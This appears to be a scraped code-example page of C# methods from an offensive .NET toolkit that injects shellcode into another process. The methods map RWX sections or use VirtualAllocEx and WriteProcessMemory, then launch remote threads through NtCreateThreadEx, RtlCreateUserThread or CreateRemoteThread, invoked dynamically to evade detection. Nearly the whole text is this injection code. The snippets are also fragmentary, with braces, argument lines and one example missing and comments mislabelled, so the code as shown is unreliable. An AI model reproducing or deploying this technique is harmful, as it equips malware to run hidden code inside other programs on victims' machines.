Beispiel #1
        /// <summary>
        /// Allocate the payload to the target process.
        /// </summary>
        /// <param name="payload">The PIC payload to allocate to the target process.</param>
        /// <param name="process">The target process.</param>
        /// <returns>Base address of allocated memory within the target process's virtual memory space.</returns>
        public IntPtr Allocate(PICPayload payload, System.Diagnostics.Process process)
            //Get a convenient handle for the target process.
            IntPtr procHandle = process.Handle;

            //Create a section to hold our payload
            IntPtr sectionAddress = CreateSection((uint)payload.Payload.Length);

            //Map a view of the section into our current process with RW permissions
            SectionDetails details = MapSection(System.Diagnostics.Process.GetCurrentProcess().Handle, sectionAddress,
                                                Win32.WinNT.PAGE_READWRITE, IntPtr.Zero, Convert.ToUInt32(payload.Payload.Length));

            //Copy the shellcode to the local view
            System.Runtime.InteropServices.Marshal.Copy(payload.Payload, 0, details.baseAddr, payload.Payload.Length);

            //Now that we are done with the mapped view in our own process, unmap it
            Win32.NtDll.NTSTATUS result = UnmapSection(System.Diagnostics.Process.GetCurrentProcess().Handle, details.baseAddr);

            //Now, map a view of the section to other process. It should already hold our shellcode.
            //If the shellcode supports it, you should use RX memory rather than RWX.
            SectionDetails newDetails = MapSection(procHandle, sectionAddress,
                                                   Win32.WinNT.PAGE_EXECUTE_READWRITE, IntPtr.Zero, (uint)payload.Payload.Length);

        /// <summary>
        /// Allocate the payload in the target process.
        /// </summary>
        /// <author>The Wover (@TheRealWover)</author>
        /// <param name="Payload">The PIC payload to allocate to the target process.</param>
        /// <param name="Process">The target process.</param>
        /// <param name="PreferredAddress">The preferred address at which to allocate the payload in the target process.</param>
        /// <returns>Base address of allocated memory within the target process's virtual memory space.</returns>
        public IntPtr Allocate(PICPayload Payload, Process Process, IntPtr PreferredAddress)
            // Get a convenient handle for the target process.
            IntPtr procHandle = Process.Handle;

            // Create a section to hold our payload
            IntPtr sectionAddress = CreateSection((uint)Payload.Payload.Length, sectionAttributes);

            // Map a view of the section into our current process with RW permissions
            SectionDetails details = MapSection(Process.GetCurrentProcess().Handle, sectionAddress,
                                                localSectionPermissions, IntPtr.Zero, Convert.ToUInt32(Payload.Payload.Length));

            // Copy the shellcode to the local view
            System.Runtime.InteropServices.Marshal.Copy(Payload.Payload, 0, details.baseAddr, Payload.Payload.Length);

            // Now that we are done with the mapped view in our own process, unmap it
            Native.NTSTATUS result = UnmapSection(Process.GetCurrentProcess().Handle, details.baseAddr);

            // Now, map a view of the section to other process. It should already hold the payload.

            SectionDetails newDetails;

            if (PreferredAddress != IntPtr.Zero)
                // Attempt to allocate at a preferred address. May not end up exactly at the specified location.
                // Refer to MSDN documentation on ZwMapViewOfSection for details.
                newDetails = MapSection(procHandle, sectionAddress, remoteSectionPermissions, PreferredAddress, (ulong)Payload.Payload.Length);
                newDetails = MapSection(procHandle, sectionAddress, remoteSectionPermissions, IntPtr.Zero, (ulong)Payload.Payload.Length);
Beispiel #3
        /// <summary>
        /// Allocate the payload in the target process via VirtualAllocEx + WriteProcessMemory
        /// </summary>
        /// <author>The Wover (@TheRealWover), aus (@aus)</author>
        /// <param name="Payload">The PIC payload to allocate to the target process.</param>
        /// <param name="Process">The target process.</param>
        /// <param name="PreferredAddress">The preferred address at which to allocate the payload in the target process.</param>
        /// <returns>Base address of allocated memory within the target process's virtual memory space.</returns>
        public IntPtr Allocate(PICPayload Payload, Process Process, IntPtr PreferredAddress = new IntPtr())
            // Get a convenient handle for the target process.
            IntPtr procHandle = Process.Handle;
            // Allocate some memory
            IntPtr regionAddress = PreferredAddress;

            if (this.AllocAPI == AllocationAPI.VirtualAllocEx)
                regionAddress = DynamicInvoke.Win32.VirtualAllocEx(procHandle, PreferredAddress, (uint)Payload.Payload.Length, AllocationType, MemoryProtection);
                if (regionAddress == IntPtr.Zero)
                    throw new AllocationFailed(Marshal.GetLastWin32Error());
            else if (this.AllocAPI == AllocationAPI.NtAllocateVirtualMemory)
                IntPtr regionSize = new IntPtr(Payload.Payload.Length);
                DynamicInvoke.Native.NtAllocateVirtualMemory(procHandle, ref regionAddress, IntPtr.Zero, ref regionSize, AllocationType, (uint)MemoryProtection);

            if (this.Write_API == WriteAPI.WriteProcessMemory)
                // Copy the shellcode to allocated memory
                bool retVal = DynamicInvoke.Win32.WriteProcessMemory(procHandle, regionAddress, Payload.Payload, (Int32)Payload.Payload.Length, out _);
                if (!retVal)
                    throw new MemoryWriteFailed(Marshal.GetLastWin32Error());
            else if (this.Write_API == WriteAPI.NtWriteVirtualMemory)
                GCHandle handle       = GCHandle.Alloc(Payload.Payload, GCHandleType.Pinned);
                IntPtr   payloadPtr   = handle.AddrOfPinnedObject();
                uint     BytesWritten = DynamicInvoke.Native.NtWriteVirtualMemory(procHandle, regionAddress, payloadPtr, (uint)Payload.Payload.Length);
                if (BytesWritten != (uint)Payload.Payload.Length)
                    throw new MemoryWriteFailed(0);

Beispiel #4
        /// <summary>
        /// Create a thread in the remote process.
        /// </summary>
        /// <author>The Wover (@TheRealWover)</author>
        /// <param name="Payload">The shellcode payload to execute in the target process.</param>
        /// <param name="BaseAddress">The address of the shellcode in the target process.</param>
        /// <param name="Process">The target process to inject into.</param>
        /// <returns></returns>
        public bool Inject(PICPayload Payload, IntPtr BaseAddress, Process Process)
            IntPtr threadHandle = new IntPtr();

            Native.NTSTATUS result = Native.NTSTATUS.Unsuccessful;

            if (api == APIS.NtCreateThreadEx)
                // Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process.
                result = DynamicInvoke.Native.NtCreateThreadEx(
                    ref threadHandle,
                    Process.Handle, BaseAddress, IntPtr.Zero,
                    suspended, 0, 0, 0, IntPtr.Zero
            else if (api == APIS.RtlCreateUserThread)
                // Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process.
                result = DynamicInvoke.Native.RtlCreateUserThread(
                    IntPtr.Zero, IntPtr.Zero, IntPtr.Zero,
                    IntPtr.Zero, ref threadHandle, IntPtr.Zero
            else if (api == APIS.CreateRemoteThread)
                uint   flags    = suspended ? (uint)0x00000004 : 0;
                IntPtr threadid = new IntPtr();

                // Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process.
                threadHandle = DynamicInvoke.Win32.CreateRemoteThread(
                    ref threadid

                if (threadHandle == IntPtr.Zero)
                handle = threadHandle;

            // If successful, return the handle to the new thread. Otherwise return NULL
            if (result == Native.NTSTATUS.Unsuccessful || result <= Native.NTSTATUS.Success)
            handle = threadHandle;
Beispiel #5
        public bool Inject(PICPayload Payload, AllocationTechnique AllocationTechnique, Process Process)
            IntPtr baseAddr = AllocationTechnique.Allocate(Payload, Process);

            return(Inject(Payload, baseAddr, Process));